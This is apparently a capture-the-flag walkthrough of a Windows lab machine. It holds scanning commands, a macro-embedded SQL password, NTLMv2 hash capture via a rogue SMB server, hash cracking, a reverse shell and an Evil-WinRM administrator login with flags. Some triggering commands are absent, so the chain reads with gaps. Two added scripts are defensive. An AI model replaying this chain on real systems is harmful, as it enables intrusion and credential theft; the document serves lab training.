As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.
The following nmap command scans the target machine for open ports quickly and saves the output to a file:
-sS use the TCP SYN scan option. This scan is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scan the entire port range, from 1 to 65535.
-T5 insane mode, the fastest of nmap's timing templates (listed here, although the logged command line below omits it).
-Pn treat the host as online and skip host discovery.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allPorts file.
# Nmap 7.93 scan initiated Mon Apr 3 19:49:39 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.125
Nmap scan report for 10.10.10.125
Host is up (0.040s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
# Nmap done at Mon Apr 3 19:49:53 2023 -- 1 IP address (1 host up) scanned in 14.05 seconds
Now that we know which ports are open, let's identify the services and versions running on them. The following command scans these ports in more depth and saves the result into a file:
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into a file, in this case the targeted file.
# Nmap 7.93 scan initiated Mon Apr 3 19:50:25 2023 as: nmap -sCV -p135,139,445,1433,5985,47001,49664,49665,49666,49667,49668,49669,49670,49671 -Pn -n -oN targeted 10.10.10.125
Nmap scan report for 10.10.10.125
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-04-03T17:47:51
|_Not valid after: 2053-04-03T17:47:51
|_ssl-date: 2023-04-03T17:51:29+00:00; 0s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-04-03T17:51:25
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 3 19:51:29 2023 -- 1 IP address (1 host up) scanned in 63.93 seconds
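As an added example (not part of the original writeup), here is a small Python triage script that parses nmap's normal output, as captured above, and flags the findings a defender would act on: directly reachable SMB, MSSQL and WinRM, SMB signing not enforced, and the self-signed fallback certificate on SQL Server. The sample output is a trimmed copy constructed from the scan above; the rules table is an assumption of mine, not nmap's.

```python
import re

# Constructed sample: a trimmed copy of the targeted scan output shown above.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
"""

# Matches "445/tcp open microsoft-ds?" and "1433/tcp open ms-sql-s <version>".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Assumed exposure rules: what a defender should question when the port is open.
EXPOSED_PORTS = {
    445: "SMB reachable from the scanning network",
    1433: "SQL Server exposed directly; should sit behind a firewall or VPN",
    5985: "WinRM (HTTP) exposed; restrict to management hosts",
}


def parse_nmap(text):
    """Return (ports, script_lines): ports maps number -> (service, version)."""
    ports, scripts = {}, []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(3) == "open":
            ports[int(m.group(1))] = (m.group(4), m.group(5) or "")
        elif line.startswith("|"):
            # NSE script output; strip the "|", "|_" and indentation prefix.
            scripts.append(line.lstrip("|_ ").strip())
    return ports, scripts


def triage(text):
    """Turn a scan into a list of (port, finding) pairs worth a ticket."""
    ports, scripts = parse_nmap(text)
    findings = [(p, EXPOSED_PORTS[p]) for p in sorted(ports) if p in EXPOSED_PORTS]
    if 445 in ports and any("enabled but not required" in s for s in scripts):
        findings.append((445, "SMB signing not enforced"))
    if 1433 in ports and any("SSL_Self_Signed_Fallback" in s for s in scripts):
        findings.append((1433, "SQL Server using self-signed fallback TLS certificate"))
    return findings
```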
Let's start by enumerating the SMB service. As we can see, there is one share called Reports on which we have read access.
smbmap -H 10.10.10.125 -u 'guest'
[+] IP: 10.10.10.125:445 Name: HTB.LOCAL
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
Reports READ ONLY
Let's connect to it.
smbclient //10.10.10.125/Reports -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jan 29 00:23:48 2019
.. D 0 Tue Jan 29 00:23:48 2019
Currency Volume Report.xlsm A 12229 Sun Jan 27 23:21:34 2019
5158399 blocks of size 4096. 836579 blocks available
There is one file called Currency Volume Report.xlsm. Let's download it to our local machine.
smb: \> get "Currency Volume Report.xlsm"
Exploitation
If we try to open it with LibreOffice, we'll see a popup message saying that the file contains macros.
libreoffice Currency\ Volume\ Report.xlsm
If we check the macros with olevba, we'll see that one of them connects to an MSSQL database with hard-coded credentials.
olevba Currency\ Volume\ Report.xlsm
olevba 0.60.1 on Python 3.11.1 - http://decalage.info/python/oletools
===============================================================================
FILE: Currency Volume Report.xlsm
Type: OpenXML
WARNING For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' macro to pull data for client volume reports
'
' further testing required
Private Sub Connect()
Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open
If conn.State = adStateOpen Then
' MsgBox "connection successful"
'Set rs = conn.Execute("SELECT * @@version;")
Set rs = conn.Execute("SELECT * FROM volume;")
Sheets(1).Range("A1").CopyFromRecordset rs
rs.Close
End If
End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|Suspicious|Open |May open a file |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
+----------+--------------------+---------------------------------------------+
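The credentials sit in plain text inside the macro's ADODB connection string, which is exactly what an Office-file review should catch before such a workbook is shared. As an added example (not the author's code), the following Python scans VBA source recovered with olevba for ConnectionString assignments, parses the ODBC key=value string, and reports hard-coded passwords without echoing them; the macro text is a trimmed copy of the one above and the key lists are my own assumptions.

```python
import re

# Constructed sample: a trimmed copy of the macro olevba recovered above.
MACRO_SOURCE = '''
Private Sub Connect()
Dim conn As ADODB.Connection
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open
End Sub
'''

# Assumed key names that carry a secret or an account in ODBC/ADO connection strings.
SECRET_KEYS = {"pwd", "password"}
USER_KEYS = {"uid", "user id", "user"}

# Any "<obj>.ConnectionString = "..."" assignment in VBA source.
CONN_ASSIGN = re.compile(r'\.ConnectionString\s*=\s*"([^"]*)"', re.IGNORECASE)


def parse_connection_string(value):
    """Split 'Key=Value;Key={Braced;Value}' into a dict with lower-cased keys."""
    parts = {}
    for key, val in re.findall(r'([^=;]+)=(\{[^}]*\}|[^;]*)', value):
        parts[key.strip().lower()] = val.strip().strip("{}")
    return parts


def find_hardcoded_credentials(vba_source):
    """Return one finding per connection string that embeds a password.

    The password itself is deliberately left out of the finding so the
    report can be shared without spreading the secret further."""
    findings = []
    for m in CONN_ASSIGN.finditer(vba_source):
        parts = parse_connection_string(m.group(1))
        if not any(k in parts for k in SECRET_KEYS):
            continue
        user = next((parts[k] for k in USER_KEYS if k in parts), None)
        findings.append({
            "server": parts.get("server"),
            "database": parts.get("database"),
            "user": user,
            "trusted_connection": parts.get("trusted_connection", "").lower() == "yes",
            "password_present": True,
        })
    return findings
```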
With those credentials we can connect to the database with Impacket's mssqlclient:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
When we have access to an MSSQL database, the goal is to run xp_cmdshell to execute commands on the underlying system. The problem is that our current user lacks the privileges to enable it.
xp_cmdshell whoami
[-] ERROR(QUERIER): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
For now, we can't use this utility. Instead, we can make the MSSQL server request a non-existent file from an SMB server we control; when the server authenticates to it, we capture the NTLMv2 hash of the account the SQL service runs as. Set up a simple SMB server on our local system.
impacket-smbserver smbFolder $(pwd) -smb2support
Now, connect to the SMB server from the MSSQL server, and we'll get the NTLMv2 hash of the mssql-svc user.
Copy and paste the hash into a file called hash, and crack it with john.
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
corporate568 (mssql-svc)
1g 0:00:00:03 DONE (2023-04-04 10:02) 0.2932g/s 2627Kp/s 2627Kc/s 2627KC/s correforenz..cornamuckla
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Our netcat listener receives the connection and we land in a shell as mssql-svc:
Listening on 0.0.0.0 4444
Connection received on 10.10.10.125 49700
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
querier\mssql-svc
C:\Windows\system32>type \users\mssql-svc\desktop\user.txt
type \users\mssql-svc\desktop\user.txt
2b3515a3eb580340939320ea2f176c6c
Privilege Escalation
Let's create a directory called privEsc in C:\Windows\Temp and go there.
cd \windows\temp
mkdir privEsc
cd privEsc
Now, let's upload the PowerUp.ps1 script to the system and run it to look for a way to escalate privileges. Start the SMB server in the directory where the PowerShell script is located.
The script found a password for the administrator user. As we now have credentials, we can get a shell as Administrator over WinRM. Then, all we have to do is reap the harvest and take the root flag.
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
querier\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
cedef5487249d8c77383bc41c3416522